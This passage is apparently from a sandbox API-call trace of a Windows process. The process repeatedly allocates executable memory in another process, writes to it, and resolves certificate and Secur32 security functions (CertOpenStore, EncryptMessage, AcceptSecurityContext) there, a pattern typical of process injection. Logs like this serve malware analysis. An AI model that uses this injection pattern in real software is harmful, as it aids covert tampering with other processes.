	[0188.211] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.211] ResetEvent (hEvent=0x478) returned 1
	[0188.211] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.211] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.211] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.211] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.211] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.212] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005509c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.212] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.212] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.212] lstrlenA (lpString="CertFindCertificateInStore") returned 26
	[0188.212] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.212] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7088*, nSize=0x1b, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7088*, lpNumberOfBytesWritten=0x12857c*=0x1b) returned 1
	[0188.213] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.213] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.213] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.213] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.213] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.213] ResetEvent (hEvent=0x478) returned 1
	[0188.213] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.214] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.214] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.214] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.214] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.214] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550a0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.214] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.215] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.215] lstrlenA (lpString="CertOpenStore") returned 13
	[0188.215] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.215] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb70a6*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb70a6*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0188.215] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.215] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.215] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.215] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.216] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.216] ResetEvent (hEvent=0x478) returned 1
	[0188.216] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.216] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.216] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.216] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.217] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.217] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550a4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.217] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.217] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.217] lstrlenA (lpString="CertGetCertificateContextProperty") returned 33
	[0188.217] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.217] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb70b6*, nSize=0x22, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb70b6*, lpNumberOfBytesWritten=0x12857c*=0x22) returned 1
	[0188.218] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.218] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.218] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.218] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.218] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.219] ResetEvent (hEvent=0x478) returned 1
	[0188.219] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.219] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.219] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.219] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.219] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.219] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550a8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.220] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.220] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.220] lstrlenA (lpString="CertFindExtension") returned 17
	[0188.220] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.220] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb70da*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb70da*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0188.220] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.220] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.220] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.221] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.221] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.221] ResetEvent (hEvent=0x478) returned 1
	[0188.221] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.221] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.222] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.222] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.222] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.222] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550ac, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.222] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.222] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.222] lstrlenA (lpString="CertCreateCertificateContext") returned 28
	[0188.222] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1d, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.223] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f80*, nSize=0x1d, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f80*, lpNumberOfBytesWritten=0x12857c*=0x1d) returned 1
	[0188.223] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.223] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.223] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.223] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.223] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.224] ResetEvent (hEvent=0x478) returned 1
	[0188.224] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.224] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.224] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.224] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.224] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.224] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550b0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.225] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.225] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb71c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0188.225] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb71c8, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=12 | out: lpWideCharStr="Secur32.dll") returned 12
	[0188.225] lstrlenW (lpString="Secur32.dll") returned 11
	[0188.225] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.225] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.225] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.225] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.225] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.226] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.226] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.226] ResetEvent (hEvent=0x478) returned 1
	[0188.226] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.253] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.253] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.253] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.253] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.253] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.254] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.254] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.254] lstrlenA (lpString="ApplyControlToken") returned 17
	[0188.254] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.254] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb710e*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb710e*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0188.254] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.254] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.254] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.255] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.255] ResetEvent (hEvent=0x478) returned 1
	[0188.255] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.257] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.257] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.257] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.257] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.257] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552a4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.258] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.258] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.258] lstrlenA (lpString="QueryContextAttributesA") returned 23
	[0188.258] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.258] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7122*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7122*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.258] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.258] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.258] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.259] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.259] ResetEvent (hEvent=0x478) returned 1
	[0188.259] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.259] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.259] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.260] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.260] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.260] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552a8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.260] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.260] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.260] lstrlenA (lpString="EncryptMessage") returned 14
	[0188.260] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.260] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb713c*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb713c*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.261] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.261] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.261] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.261] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.261] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.262] ResetEvent (hEvent=0x478) returned 1
	[0188.262] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.262] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.262] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.262] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.262] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552ac, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.263] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.263] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.263] lstrlenA (lpString="AcceptSecurityContext") returned 21
	[0188.263] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.263] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb714e*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb714e*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0188.263] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.263] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.263] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.264] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.264] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.264] ResetEvent (hEvent=0x478) returned 1
	[0188.264] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.264] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.265] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
